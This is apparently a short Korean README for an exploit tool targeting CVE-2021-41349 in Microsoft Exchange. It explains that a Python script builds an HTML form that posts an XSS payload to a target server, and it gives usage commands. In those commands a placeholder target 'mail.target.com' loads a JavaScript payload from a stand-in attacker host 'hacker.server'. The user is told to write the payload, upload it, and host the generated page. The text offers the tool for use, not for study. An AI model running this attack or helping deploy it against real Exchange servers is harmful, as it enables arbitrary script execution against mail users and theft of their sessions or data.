
Exploit 도구로, CVE-2021-41349을 대상으로 하여 Microsoft Exchange 서버에 XSS 페이로드를 전달하는 HTML 양식을 생성하며, 임의의 JavaScript 실행을 가능하게 합니다.
익스플로잇: CVE-2021-41349
이 익스플로잇 도구는 대상 Exchange 서버에 XSS 페이로드를 게시하기 위한 Form을 생성합니다.
원하는 작업을 포함하는 js 파일을 생성해야 합니다.
js 페이로드를 생성하고 어딘가에 업로드하세요.CVE-2021-41349.py를 실행하세요.python3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
또는:
./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
html 파일을 서버에 업로드하세요.